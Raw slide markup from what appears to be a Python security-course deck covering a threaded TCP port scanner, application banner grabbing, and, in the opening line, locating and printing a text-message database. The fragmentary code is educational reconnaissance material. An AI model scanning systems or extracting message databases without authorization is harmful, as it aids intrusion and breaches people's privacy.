              <a:t>Finally we can list out all the contents of this directory and test each file until we don’t find the text message database. If found then print the contents of the database.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-135064" lvl="0" marL="571500" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3273"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="342900" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1258" name="Google Shape;1258;p85"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10602675" y="555550"/>
            <a:ext cx="1589325" cy="1435925"/>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40"/>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Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5200">
                <a:latin typeface="Russo One"/>
                <a:ea typeface="Russo One"/>
                <a:cs typeface="Russo One"/>
                <a:sym typeface="Russo One"/>
              </a:rPr>
              <a:t>THANK YOU!!</a:t>
            </a:r>
            <a:endParaRPr sz="5200">
              <a:latin typeface="Russo One"/>
              <a:ea typeface="Russo One"/>
              <a:cs typeface="Russo One"/>
              <a:sym typeface="Russo On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fa79f84f46_0_11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4" y="10369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PORT SCANNER CONTD..</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="Google Shape;302;g1fa79f84f46_0_11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219600" y="1991350"/>
            <a:ext cx="11453100" cy="491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setdefaulttimeout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ports</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tgt_ports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threading</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Thread</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target</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conn_scan</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ports</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)))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start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conn_scan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tgt_port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screen_lock</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threading</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Semaphore</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>()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with</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AF_INET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SOCK_STREAM</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conn_skt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try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conn_skt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connect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tgt_port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conn_skt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send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b</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'Cyber</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>\r\n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results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conn_skt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recv</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100</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decode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'utf-8'</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screen_lock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acquire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tgt_port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/tcp open'</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[&gt;]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results</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chemeClr val="lt1"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="dk1"/>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fa79f84f46_0_17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4" y="10369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PORT SCANNER CONTD..</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="308" name="Google Shape;308;g1fa79f84f46_0_17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="229725" y="1968775"/>
            <a:ext cx="11451300" cy="4970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0">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OSError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screen_lock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acquire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tgt_port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/tcp closed"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finally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screen_lock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release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argparse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ArgumentParser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usage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"port_scan.py TARGET_HOST -p TARGET_PORTS"</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example: python3 port_scan.py scanme.nmap.org -p 21,80"</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add_argument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type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metavar</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"TARGET_HOST"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help</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"specify target host (IP address or domain name)"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add_argument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"-p"</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required</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True</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type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metavar</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"TARGET_PORTS"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help</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"specify target port[s] separated by comma "</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"(no spaces)"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parse_args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.tgt_ports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.p).</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>split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61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>port_scan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.tgt_host, </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.tgt_ports)</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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="164746"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Application Banner Grabbing</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="Google Shape;314;p6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="220950" y="2058625"/>
            <a:ext cx="10638900" cy="35994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lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In order to grab the application banner from our target host, we must first insert additional code into the connScan function. After discovering an open port, we send a string of data to the port and wait for the response. Gathering this response might give us an indication of the application running on the target host and port.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="Google Shape;315;p6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467150" y="3802300"/>
            <a:ext cx="10859400" cy="2897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400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>import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5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>socket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C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>def</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banner</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ip</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E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>port</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if</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E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>port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E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>port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E5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>range</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D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>21</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D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>1024</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D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>1</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for</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i</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in</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E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>port</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print</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E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>i</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s</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5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>socket</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E5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>socket</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s</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61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>settimeout</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D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>3</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e9adf94182_2_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="33796" y="8350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latin typeface="Russo One"/>
                <a:ea typeface="Russo One"/>
                <a:cs typeface="Russo One"/>
                <a:sym typeface="Russo One"/>
              </a:rPr>
              <a:t>BUILDING A PORT SCANNER</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Russo One"/>
              <a:ea typeface="Russo One"/>
              <a:cs typeface="Russo One"/>
              <a:sym typeface="Russo One"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="Google Shape;205;g1e9adf94182_2_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="33801" y="2124099"/>
            <a:ext cx="11472600" cy="4333261"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="349250" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Reconnaissance serves as the first step in any good cyber assault. An attacker must discover where the vulnerabilities are before selecting and choosing exploits for a target.</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="349250" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Python, like most modern languages, provides access to the BSD socket interface. BSD sockets provide an application-programming interface that allows coders to write applications in order to perform network communications between hosts. </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CONTD..</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321" name="Google Shape;321;p7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365850" y="1938375"/>
            <a:ext cx="11386200" cy="487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try</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr b="0" i="1" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="C678DD"/>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connect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ip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i</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recv</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1024</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continue</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>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else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socket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settimeout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2</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connect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ip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int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recv</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1024</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main</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ip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input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"Please enter the IP: "</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input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"Please enter the port: "</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banner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ip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61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2100" u="none" cap="none" strike="noStrike">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e9adf94182_7_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="164746"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Application Banner Grabbing</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="Google Shape;327;g1e9adf94182_7_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="164750" y="3001300"/>
            <a:ext cx="11864400" cy="35994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SzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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This statement describes a process for gathering information about an application running on a target host by inserting code into a function called "connScan." </a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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The function is used to discover open ports on the target host. Once an open port is found, a string of data is sent to the port and the response is collected. </a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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The response may provide information about the application running on that port, such as its banner or version number. This information can be used to identify vulnerabilities or other characteristics of the application.</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="Google Shape;328;g1e9adf94182_7_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631597" y="2712380"/>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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="115646" y="8432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500"/>
              <a:t>Threading the Scan</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334" name="Google Shape;334;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680325" y="2336875"/>
            <a:ext cx="9613800" cy="4175400"/>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lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Depending on the timeout variable for a socket, a scan of each socket can takes several seconds. While this appears trivial, it quickly adds up if we are scanning multiple hosts or ports. </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Ideally, we would like to scan sockets simultaneously as opposed to sequentially. Enter Python threading. </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Threading provides a way to perform these kinds of executions simultaneously. To utilize this in our scan, we will modify the iteration loop in our portScan() function. </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Notice how we call the connScan function as a thread. Each thread created in the iteration will now appear to execute at the same time.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2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e9adf94182_12_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="115646" y="8432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Threading the Scan</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="340" name="Google Shape;340;g1e9adf94182_12_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="115646" y="3025029"/>
            <a:ext cx="10810953" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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This statement describes a process for improving the efficiency of a port scan by using Python threading. The issue with the original scan is that it takes several seconds for each socket to be scanned, and this time adds up if multiple hosts or ports are being scanned. Threading is a way to perform multiple tasks simultaneously, which can improve the speed of the scan.</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
